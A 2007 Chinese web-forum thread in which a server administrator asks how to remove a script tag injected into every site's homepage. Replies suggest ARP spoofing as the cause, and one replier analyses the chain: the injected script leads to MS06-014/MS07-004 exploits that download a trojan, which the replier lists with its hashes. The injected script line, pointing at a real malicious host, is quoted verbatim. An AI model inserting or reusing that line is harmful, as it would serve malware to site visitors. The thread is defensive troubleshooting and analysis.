9,506
社区成员
发帖
与我相关
我的任务
分享服务器网页被挂木马。无法查杀,如何解决~~~急急
单位服务器,2003系统,现在打开服务器的每个站点的首业发现都有
<script language=javascript src=http://google.171738.org/ad.js></script> 这段代码。但是用记事本打开站点的首页文件发现又没有 上面这段代码/。
用 windows清理助手和瑞星查杀都无法找到病毒。
现在不知道怎么处理,恳请知道的告诉处理方法谢谢/。
<script language=javascript src=http://google.171738.org/ad.js></script> 这段代码。但是用记事本打开站点的首页文件发现又没有 上面这段代码/。
用 windows清理助手和瑞星查杀都无法找到病毒。
现在不知道怎么处理,恳请知道的告诉处理方法谢谢/。
...全文
请发表友善的回复…
发表回复
紫郢剑侠 2007-05-24
- 打赏
- 举报
update.exe
Kaspersky 报为 Worm.Win32.Delf.cc,瑞星报为 Trojan.Mnless.lxp
还会下载
文件说明符 : D:\test\rss.dll
属性 : A---
语言 : 中文(中国)
文件版本 : 6.00
说明 : Windows HTTPMon Dll
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 6.00
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : WINHTTP
源文件名 : WINHTTP.DLL
创建时间 : 2007-5-24 13:57:51
修改时间 : 2007-5-24 13:57:54
访问时间 : 2007-5-24 0:0:0
大小 : 5120 字节 5.0 KB
MD5 : 5164bccd2a40d9ac9bf83453c171c720
Kaspersky 报为 Worm.Win32.Delf.cc,瑞星报为 Trojan.Mnless.lxp
还会下载
文件说明符 : D:\test\rss.dll
属性 : A---
语言 : 中文(中国)
文件版本 : 6.00
说明 : Windows HTTPMon Dll
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 6.00
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : WINHTTP
源文件名 : WINHTTP.DLL
创建时间 : 2007-5-24 13:57:51
修改时间 : 2007-5-24 13:57:54
访问时间 : 2007-5-24 0:0:0
大小 : 5120 字节 5.0 KB
MD5 : 5164bccd2a40d9ac9bf83453c171c720
紫郢剑侠 2007-05-23
- 打赏
- 举报
看其别的网站,比如www.163.com,时是否有此代码?
没有0614漏洞,页面转到ms07004EXP!
存在0614漏洞,页面转到MS0614的EXP!"
下载 hxxp://google.171738.org/update.exe
文件说明符 : D:\test\update.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-23 12:13:25
修改时间 : 2007-5-23 12:13:26
访问时间 : 2007-5-23 0:0:0
大小 : 36435 字节 35.595 KB
MD5 : e32966b40d3e655f1912b2cd6930b24b
没有0614漏洞,页面转到ms07004EXP!
存在0614漏洞,页面转到MS0614的EXP!"
下载 hxxp://google.171738.org/update.exe
文件说明符 : D:\test\update.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-23 12:13:25
修改时间 : 2007-5-23 12:13:26
访问时间 : 2007-5-23 0:0:0
大小 : 36435 字节 35.595 KB
MD5 : e32966b40d3e655f1912b2cd6930b24b
smallcrocodile 2007-05-22
- 打赏
- 举报
恨毒恨的牙痒痒
紫郢剑侠 2007-05-22
- 打赏
- 举报
看其别人的网站时是否朋此代码?
jiaxueq 2007-05-22
- 打赏
- 举报
恭喜,服务器中了ARP欺骗。
可能是你自己的服务器中了,也可能是机房里的同一个网段的其它服务器中了。
安装 ARP防火墙 搞定!
可能是你自己的服务器中了,也可能是机房里的同一个网段的其它服务器中了。
安装 ARP防火墙 搞定!
wutieming 2007-05-22
- 打赏
- 举报
那项没有被改动,现在是发现同一个网段内的所有服务器上站点内的首页文件都有这句代码/
现在不知道怎么弄了/
按照二楼兄弟给的方法在绿色软件联盟内弄了个( MAC地址绑定工具(防ARP攻击的绿色小工具) )
帮顶了MAC地址,还是不行。
现在不知道怎么弄了/
按照二楼兄弟给的方法在绿色软件联盟内弄了个( MAC地址绑定工具(防ARP攻击的绿色小工具) )
帮顶了MAC地址,还是不行。
代码跳动 2007-05-22
- 打赏
- 举报
在iis里有个定义页底部的.查查看
wutieming 2007-05-22
- 打赏
- 举报
现在网上的ARP防火墙都是注册的。有免费版本的么??
我发现在同一个网段里的同一台机器上的站点首页也是这个问题~!~首页被挂那句代码,
我发现在同一个网段里的同一台机器上的站点首页也是这个问题~!~首页被挂那句代码,
